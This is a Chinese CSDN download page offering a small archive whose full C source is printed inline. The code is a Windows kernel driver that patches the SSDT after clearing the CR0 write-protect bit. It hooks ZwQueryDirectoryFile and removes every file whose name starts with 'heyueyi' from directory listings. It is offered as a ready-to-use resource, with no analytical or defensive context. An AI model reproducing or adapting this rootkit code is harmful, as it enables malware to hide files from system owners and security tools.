Hook_文件隐藏_win10隐藏已知文件扩展名资源-CSDN文库

共4个文件

sources：1个

c：1个

makefile：1个

sstd

hook

文件隐藏

5星 · 超过95%的资源需积分: 11 192 浏览量 2012-08-08 11:28:29 上传评论收藏 3KB RAR 举报

资源推荐

资源详情

资源评论

收起资源包目录

HideFile.sys.rar （4个子文件）

HideFile.sys

SOURCES 78B

HideFile.c 6KB

MAKEFILE 267B

sys

i386

HideFile.sys 3KB

#include<ntddk.h> #include<ntstatus.h> typedef struct _FILE_BOTH_DIR_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; ULONG EaSize; CCHAR ShortNameLength; WCHAR ShortName[12]; WCHAR FileName[1]; } FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION; #pragma pack(1) typedef struct ServiceDescriptorEntry { unsigned int *ServiceTableBase; unsigned int *ServiceCounterTableBase; unsigned int NumberOfServices; unsigned char *ParamTableBase; } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t; #pragma pack() __declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; #define SYSTEMSERVICE(_function) KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)] typedef NTSTATUS (*ZWQUERYDIRECTORYFILE)( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, OUT PVOID FileInformation, IN ULONG Length, IN FILE_INFORMATION_CLASS FileInformationClass, IN BOOLEAN ReturnSingleEntry, IN PUNICODE_STRING FileName OPTIONAL, IN BOOLEAN RestartScan ); ZWQUERYDIRECTORYFILE OldZwQueryDirectoryFile; NTSYSAPI NTSTATUS NTAPI ZwQueryDirectoryFile( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStratusBlock, OUT PVOID FileInfomation, IN ULONG Length, IN FILE_INFORMATION_CLASS FileInformationClass, IN BOOLEAN ReturnSingleEntry, IN PUNICODE_STRING FileName OPTIONAL, IN BOOLEAN RestartScan); NTSTATUS MyZwQueryDirectoryFile( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, OUT PVOID FileInformation, IN ULONG Length, IN FILE_INFORMATION_CLASS FileInformationClass, IN BOOLEAN ReturnSingleEntry, IN PUNICODE_STRING FileName OPTIONAL, IN BOOLEAN RestartScan) { NTSTATUS status; status = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile))(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, Length, FileInformationClass, ReturnSingleEntry, FileName, RestartScan); if(NT_SUCCESS(status) && (FileInformationClass == FileBothDirectoryInformation)) { ANSI_STRING ansiFileName,ansiDirName,HideDirFile; UNICODE_STRING uniFileName; PFILE_BOTH_DIR_INFORMATION pFileInfo; PFILE_BOTH_DIR_INFORMATION pLastFileInfo; BOOLEAN bLastOne; //要隐藏的文件名 RtlInitAnsiString(&HideDirFile,"heyueyi"); DbgPrint("MyZwQueryDirectoryFile"); pFileInfo = (PFILE_BOTH_DIR_INFORMATION)FileInformation; pLastFileInfo = NULL; do { bLastOne = !( pFileInfo->NextEntryOffset ); RtlInitUnicodeString(&uniFileName,pFileInfo->FileName); RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE); RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE); DbgPrint("ansiFileName :%s\n",ansiFileName.Buffer); DbgPrint("HideDirFile :%s\n",HideDirFile.Buffer); if( RtlCompareMemory(ansiFileName.Buffer,HideDirFile.Buffer,HideDirFile.Length ) == HideDirFile.Length) { if(bLastOne) { if(pLastFileInfo) pLastFileInfo->NextEntryOffset = 0; break; } else //指针往后移动 { int iPos = ((ULONG)pFileInfo) - (ULONG)FileInformation; int iLeft = (ULONG)Length - iPos - pFileInfo->NextEntryOffset; RtlCopyMemory( (PVOID)pFileInfo, (PVOID)( (char *)pFileInfo + pFileInfo->NextEntryOffset ), (ULONG)iLeft ); continue; } } pLastFileInfo = pFileInfo; pFileInfo = (PFILE_BOTH_DIR_INFORMATION)((char *)pFileInfo + pFileInfo->NextEntryOffset); }while(!bLastOne); RtlFreeAnsiString(&ansiDirName); RtlFreeAnsiString(&ansiFileName); } return status; } void UnLoad(PDRIVER_OBJECT pDriverObject) { ULONG OldCr0; _asm{ cli; mov eax,cr0 mov OldCr0,eax and eax,0fffeffffh mov cr0,eax } (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = OldZwQueryDirectoryFile; _asm { mov eax,OldCr0 mov cr0,eax sti; } DbgPrint("hide end"); } NTSTATUS HookZwQueryDirectoryFile() { ULONG OldCr0; _asm{ cli; mov eax,cr0 mov OldCr0,eax and eax,0fffeffffh mov cr0,eax } OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)); (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = MyZwQueryDirectoryFile; _asm { mov eax,OldCr0 mov cr0,eax sti; } // KdPrint(("%x %x %x",(PUCHAR)ZwQueryDirectoryFile+1,ZwQueryDirectoryFile,*(PULONG)((PUCHAR)ZwQueryDirectoryFile+1))); return STATUS_SUCCESS; } NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath) { DbgPrint("hide Begin"); if(NT_SUCCESS(HookZwQueryDirectoryFile())) pDriverObject->DriverUnload = UnLoad; else return STATUS_SEVERITY_ERROR; return STATUS_SUCCESS; }

评论收藏

内容反馈